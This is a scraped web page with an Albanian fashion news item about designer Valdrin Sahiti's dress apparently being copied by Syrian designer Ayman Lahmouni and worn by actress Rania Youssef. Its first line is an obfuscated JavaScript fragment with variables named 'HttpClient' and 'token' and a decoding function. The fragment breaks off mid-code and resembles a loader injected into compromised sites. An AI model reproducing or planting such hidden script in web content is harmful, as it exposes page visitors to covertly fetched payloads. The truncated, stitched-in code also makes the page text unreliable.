;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Kush po ia ‘vjedh’ fustanet Valdrin Sahitit?

By

Dizajneri Valdrin Sahiti prej vitesh i ka kaluar kufijtë dhe kjo nuk përbën lajm.

Dhjetëra të famshme botërore kanë zgjedhur fustanet e tij, deri tek diva e muzikës, Beyonce që Valdrinit “i është rikthyer” sërish duke zgjedhur krijimet e dizejnatorit për të dytën herë.

Kjo pashmangshëm ka sjellë edhe tendencën e kopjimit.

Për të disatën herë, krijimet e brandit “VS” po kopjohen nëpër botë.

I radhës ka qenë një fustan i veshur nga aktorja e njohur egjiptiane Rania Youssef në tapetin e kuq të një festivali filmi në Egjipt.

Kopjimi i dizejnatorit sirian Ayman Lahmouni është mëse evident dhe si i tillë është pikasur nga faqe të ndryshme që merren me modën.

Me gjasë i lodhur nga kjo tendencë e përsëritur, dizajneri Sahiti është shprehur:

“Tjëtër kopje i njëjti “dizajner””

Urojmë që siriani të jetë më kreativ tani e tutje kur Valdrini u desh të reagojë. /Prive.al

Artikuj të ngjashëm